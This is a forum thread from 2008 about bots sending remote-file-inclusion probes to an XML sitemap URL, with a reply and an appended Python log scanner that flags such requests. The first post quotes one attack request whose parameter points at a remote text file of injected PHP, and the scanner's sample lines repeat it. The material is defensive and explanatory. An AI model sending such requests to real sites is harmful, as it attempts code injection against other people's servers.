Security: Repeated perl bot attack attempts targeting sitemap
« on: January 01, 2008, 11:16:19 PM »
Hi all.

In following my site's traffic, I've noticed persistent attack attempts by bots specifically targeting the sitemap. The user agent is almost always libwww-perl/5.805. The bots typically reference a PHP instruction that has been uploaded onto someone else's site in a text file. The code in the text file is what the bot attempts to inject into the form on the target page (i.e. the admin login).

Here is a generic example of an attempt:
   
/sitemap.xml/index.php?action=http://otherwebsite/folder/textfile.txt??

XML-SITEMAPS, of course, creates an admin login page, but not at the location of the XML file that is generated.

Are there any known security issues with these types of attacks?
Thanks
websitebob
Re: Security: Repeated perl bot attack attempts targeting sitemap
« Reply #1 on: January 02, 2008, 06:46:26 PM »
Hello,

The XML sitemap is NOT an executable page, so it cannot be exploited in any way. This must be a bot script that just attempts to attach parameters to any found URL on the site.
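
A log check for the request pattern discussed in this thread, added here as an example and not written by either poster: it flags requests whose query parameters carry a remote URL and records whether the server actually answered them. The combined access-log format, the function names and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Combined log format is an assumption; the thread shows no raw log lines.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<agent>[^"]*)"')
REMOTE = re.compile(r'^(?:https?|ftp)://', re.I)

def classify(line):
    """Return a finding dict if a query parameter value is a remote URL."""
    m = LOG_RE.match(line)
    if not m:
        return None
    query = urlsplit(m['target']).query
    # parse_qsl percent-decodes, so encoded values (http%3A%2F%2F...) match too.
    params = [n for n, v in parse_qsl(query, keep_blank_values=True)
              if REMOTE.match(v)]
    if not params:
        return None
    return {
        'ip': m['ip'],
        'target': m['target'],
        'params': params,
        # 2xx: something answered this URL, so check what handled it.
        # 404: the path did not exist and the request hit nothing.
        'answered': m['status'].startswith('2'),
        'scripted_agent': m['agent'].lower().startswith('libwww-perl'),
    }

def find_probes(lines):
    return [f for f in map(classify, lines) if f]

# Constructed sample lines: documentation IP ranges, placeholder host from the post.
SAMPLE = [
    '192.0.2.10 - - [01/Jan/2008:22:58:03 +0000] "GET /sitemap.xml/index.php?action=http://otherwebsite/folder/textfile.txt?? HTTP/1.1" 404 312 "-" "libwww-perl/5.805"',
    '192.0.2.10 - - [01/Jan/2008:22:58:04 +0000] "GET /index.php?page=http%3A%2F%2Fotherwebsite%2Ffolder%2Ftextfile.txt%3F HTTP/1.1" 200 5120 "-" "libwww-perl/5.805"',
    '198.51.100.7 - - [01/Jan/2008:22:59:10 +0000] "GET /sitemap.xml HTTP/1.1" 200 20480 "-" "Googlebot/2.1"',
    '203.0.113.5 - - [01/Jan/2008:23:01:42 +0000] "GET /login.php?next=/account HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
]

if __name__ == '__main__':
    for finding in find_probes(SAMPLE):
        print(finding)
```

Findings with `answered` set to false match the case in the reply above, where the parameters were appended to a URL that nothing executes; findings with `answered` set to true point at a script whose handling of that parameter should be reviewed.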